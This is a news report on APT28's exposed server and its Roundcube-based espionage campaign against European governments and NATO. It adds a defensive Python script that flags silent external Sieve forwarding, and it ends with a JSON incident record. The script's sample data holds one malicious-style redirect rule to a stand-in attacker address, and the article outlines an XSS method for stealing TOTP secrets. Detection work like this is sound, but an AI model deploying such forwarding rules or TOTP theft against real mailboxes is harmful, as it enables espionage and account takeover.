FancyBear’s Major OpSec Blunder Exposes Espionage Campaign Targeting European Governments and NATO
In a rare operational security failure, Russian state-linked hacking group FancyBear (APT28/Forest Blizzard/GRU Unit 26165) inadvertently exposed a long-running cyberespionage campaign after leaving a server unsecured for over 500 days. The breach, first detected by threat intelligence firm Hunt.io on January 13, 2026, and later analyzed by Ctrl-Alt-Intel, provided researchers with unprecedented visibility into Operation Roundish, an active campaign targeting government and military entities across Europe.
The exposed server, a NameCheap Virtual Private Server (VPS) hosted in the U.S. at IP 203.161.50.145, had been previously attributed to FancyBear by Ukraine’s CERT-UA in September 2024, yet the group continued using it without interruption. The open directory contained 2,800 exfiltrated government and military emails, 240 stolen credentials (including passwords and TOTP 2FA secrets), 140 silent email-forwarding rules, and 11,500 harvested contact addresses from victims in Ukraine, Romania, Bulgaria, Greece, Serbia, and North Macedonia. Notably, the stolen data included email addresses tied to four NATO member states, including NATO’s own headquarters infrastructure.
A second exposed directory, discovered by Ctrl-Alt-Intel, revealed even more sensitive material: FancyBear’s full command-and-control (C2) source code, additional JavaScript payloads, campaign telemetry logs, and further exfiltrated data. The targeting pattern aligned with geopolitical priorities, with Ukraine’s regional prosecutors (likely linked to war crimes investigations) as the largest victim group. Other high-profile targets included Romania’s Air Force, Greece’s National Defence General Staff, Serbia’s Ministry of Defence, and Bulgarian government entities, all nations involved in recent military cooperation, such as Greece’s training of Ukrainian F-16 pilots and a 2024 military mobility agreement between Romania, Bulgaria, and Greece.
The most alarming technical aspect of the campaign was FancyBear’s method for silently bypassing 2FA. Using a JavaScript module (keyTwoAuth.js), the group exploited a Roundcube webmail XSS vulnerability to extract TOTP secrets and recovery codes from authenticated sessions without victim interaction. The module parsed the twofactorgauthenticator plugin settings, encoded the stolen data, and exfiltrated it to the group’s C2 server (zhblz.com) under the log prefix ktfu. Researchers recovered 516 log entries from 108 unique victim addresses, with 256 accounts having their TOTP secrets compromised, including targets at Romania’s Air Force, Greece’s GEETHA, Ukraine’s Asset Recovery Agency, and Serbia’s Ministry of Defence. The remaining 260 accounts had no 2FA enabled, making them trivial to access.
The exposure underscores the group’s persistent reliance on known infrastructure despite prior attribution, as well as the sophistication of its 2FA bypass techniques. While the incident provides defenders with critical intelligence, it also highlights the ongoing threat posed by FancyBear to NATO-aligned governments and military organizations.
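The 140 silent email-forwarding rules recovered from the server are the kind of persistence a mail administrator can hunt for directly. The following audit script is an added example, not code from the article or from any of the researchers it cites; it assumes (as the article does not state) that the forwarding rules live in per-user Sieve scripts, which is how Roundcube's managesieve plugin stores them, and the sample scripts and domain names are constructed for illustration.

```python
import re
from dataclasses import dataclass

# Constructed sample Sieve scripts keyed by mailbox (hypothetical domains).
# A Sieve "redirect" without the ":copy" tag forwards the message and drops it
# from the user's inbox, which is what makes such a rule "silent".
SAMPLE_SCRIPTS = {
    "alice@mod.example": 'require ["copy"];\n'
                         'if true { redirect :copy "alice.backup@mod.example"; }\n',
    "bob@airforce.example": 'if header :contains "subject" "" '
                            '{ redirect "collector@attacker-mail.example"; }\n',
    "carol@prosecutor.example": 'if header :contains "from" "court" { fileinto "Court"; }\n',
}

# Domains the organisation considers its own (assumed for the example).
INTERNAL_DOMAINS = {"mod.example", "airforce.example", "prosecutor.example"}

# Matches: redirect [:tag ...] "address";  -- tags captured in group 1
REDIRECT_RE = re.compile(r'redirect\s+((?::\w+\s+)*)"([^"]+)"\s*;')

@dataclass
class Finding:
    mailbox: str
    target: str
    silent: bool    # True when no :copy tag, so the original never reaches the inbox
    external: bool  # True when the target domain is not one of ours

def audit_sieve(mailbox, script, internal_domains):
    """Return one Finding per redirect action found in a user's Sieve script."""
    findings = []
    for match in REDIRECT_RE.finditer(script):
        tags, target = match.group(1), match.group(2)
        domain = target.rsplit("@", 1)[-1].lower()
        findings.append(Finding(mailbox, target,
                                silent=":copy" not in tags,
                                external=domain not in internal_domains))
    return findings

def suspicious_forwards(scripts, internal_domains):
    """Keep only rules that both hide the message and send it off-site."""
    flagged = []
    for mailbox, script in scripts.items():
        flagged += [f for f in audit_sieve(mailbox, script, internal_domains)
                    if f.silent and f.external]
    return flagged

if __name__ == "__main__":
    for f in suspicious_forwards(SAMPLE_SCRIPTS, INTERNAL_DOMAINS):
        print(f"{f.mailbox}: silent external forward to {f.target}")
```

In a real deployment the scripts would be pulled over ManageSieve or read from the mail store rather than embedded, and any hit should trigger credential and TOTP rotation for that mailbox alongside removal of the rule.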
Source: https://cybersecuritynews.com/fancybear-server-exposure-reveals-stolen-credentials/
NATO cybersecurity rating report: https://www.rankiteo.com/company/nato
{
  "id": "NAT1773851315",
  "linkid": "nato",
  "type": "Cyber Attack",
  "date": "3/2026",
  "severity": "100",
  "impact": "6",
  "explanation": "Attack threatening the economy of geographical region"
}
{
  "affected_entities": [
    {"industry": "Law enforcement/judicial", "location": "Ukraine", "name": "Ukraine’s regional prosecutors", "type": "Government"},
    {"industry": "Defense", "location": "Romania", "name": "Romania’s Air Force", "type": "Military"},
    {"industry": "Defense", "location": "Greece", "name": "Greece’s National Defence General Staff (GEETHA)", "type": "Military"},
    {"industry": "Defense", "location": "Serbia", "name": "Serbia’s Ministry of Defence", "type": "Government"},
    {"industry": "Public sector", "location": "Bulgaria", "name": "Bulgarian government entities", "type": "Government"},
    {"industry": "Defense/military alliance", "location": "Multiple (NATO member states)", "name": "NATO headquarters infrastructure", "type": "International organization"}
  ],
  "attack_vector": "Exposed server (unsecured VPS), JavaScript payloads (XSS vulnerability in Roundcube webmail)",
  "data_breach": {
    "data_exfiltration": true,
    "file_types_exposed": ["Emails", "JavaScript payloads", "Telemetry logs", "Credentials"],
    "number_of_records_exposed": "2,800 emails, 240 credentials, 11,500 contact addresses",
    "personally_identifiable_information": "Email addresses, TOTP secrets, recovery codes",
    "sensitivity_of_data": "High (military/defense communications, 2FA secrets, NATO-related data)",
    "type_of_data_compromised": ["Government/military emails", "Credentials (passwords, TOTP secrets)", "Contact addresses", "Email-forwarding rules"]
  },
  "date_detected": "2026-01-13",
  "description": "In a rare operational security failure, Russian state-linked hacking group FancyBear (APT28/Forest Blizzard/GRU Unit 26165) inadvertently exposed a long-running cyberespionage campaign after leaving a server unsecured for over 500 days. The breach provided researchers with unprecedented visibility into Operation Roundish, an active campaign targeting government and military entities across Europe. The exposed server contained exfiltrated emails, stolen credentials, silent email-forwarding rules, and harvested contact addresses from victims in Ukraine, Romania, Bulgaria, Greece, Serbia, and North Macedonia, including NATO member states.",
  "impact": {
    "brand_reputation_impact": "Significant reputational damage to targeted governments and NATO due to exposure of sensitive data",
    "data_compromised": "2,800 exfiltrated government and military emails, 240 stolen credentials (including passwords and TOTP 2FA secrets), 140 silent email-forwarding rules, 11,500 harvested contact addresses",
    "identity_theft_risk": "High (TOTP secrets and recovery codes compromised)",
    "operational_impact": "Compromised 2FA protections, unauthorized access to sensitive communications, potential long-term espionage capabilities",
    "systems_affected": "Government and military email systems (Roundcube webmail), NATO infrastructure"
  },
  "initial_access_broker": {
    "high_value_targets": ["Ukraine’s regional prosecutors", "Romania’s Air Force", "Greece’s GEETHA", "Serbia’s Ministry of Defence", "NATO infrastructure"]
  },
  "investigation_status": "Ongoing (exposed data analyzed by researchers)",
  "lessons_learned": "FancyBear’s persistent reliance on known infrastructure despite prior attribution; sophistication of 2FA bypass techniques; risks of unsecured servers in state-sponsored campaigns.",
  "motivation": "State-sponsored espionage, geopolitical intelligence gathering",
  "post_incident_analysis": {
    "corrective_actions": "Secure exposed servers; revoke and rotate all compromised credentials; implement stricter access controls for government/military email systems; deploy enhanced monitoring for state-sponsored threat activity.",
    "root_causes": "Unsecured VPS server (NameCheap) left exposed for 500+ days; exploitation of Roundcube XSS vulnerability; lack of operational security (OpSec) discipline in reusing attributed infrastructure."
  },
  "recommendations": "Immediate revocation of compromised credentials and TOTP secrets; patching Roundcube XSS vulnerabilities; enhanced monitoring of email systems; network segmentation for sensitive government/military infrastructure; regular audits of third-party VPS security.",
  "references": [{"source": "Hunt.io"}, {"source": "Ctrl-Alt-Intel"}, {"source": "Ukraine’s CERT-UA"}],
  "response": {"third_party_assistance": "Hunt.io, Ctrl-Alt-Intel, Ukraine’s CERT-UA"},
  "threat_actor": "FancyBear (APT28/Forest Blizzard/GRU Unit 26165)",
  "title": "FancyBear’s Major OpSec Blunder Exposes Espionage Campaign Targeting European Governments and NATO",
  "type": "Cyberespionage",
  "vulnerability_exploited": "Roundcube webmail XSS vulnerability, twofactorgauthenticator plugin misconfiguration"
}